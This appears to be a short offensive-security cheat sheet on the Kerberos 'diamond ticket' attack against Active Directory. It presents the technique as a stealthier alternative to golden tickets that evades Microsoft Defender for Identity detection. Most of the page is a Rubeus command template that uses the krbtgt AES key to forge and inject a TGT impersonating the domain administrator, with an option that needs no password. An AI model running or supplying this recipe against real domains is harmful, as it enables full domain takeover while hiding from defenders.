Diamond Ticket
When we forge a
diamont ticket
, there is no pre-auth request corresponding to the forged ticket. This is an anomaly and can be detected by MDIs.To bypass this, we can request a TGT, decrypt it, modify if, then re-encrypt it, using the AES keys of the
krbtgt
account.Diamond ticket is the opsec safe version of the golden ticket.
Rubeus
Rubues.exe diamond
/krbkey:<aes-key> # krbtgt aes account
/user:<username> # user to use for as-req
/password:<password> # password for the user to use for as-req
/enctype:aes
/ticketuser:administrator # user to create forged ticket for
/domain:<domain-fqdn> # fqdn of the domain
/dc:<dc-fqdn> # fqdn of the domain controller
/ticketuserID # impersonated user ID, RID of administrator
/groups
/createnetonly:C\windows\system32\cmd.exe # logon type 9, only net requests.
/show
/ptt
# instead of the passsing username & password, we can use
/tgtdeleg # this will use the current user, and does not require password
Last updated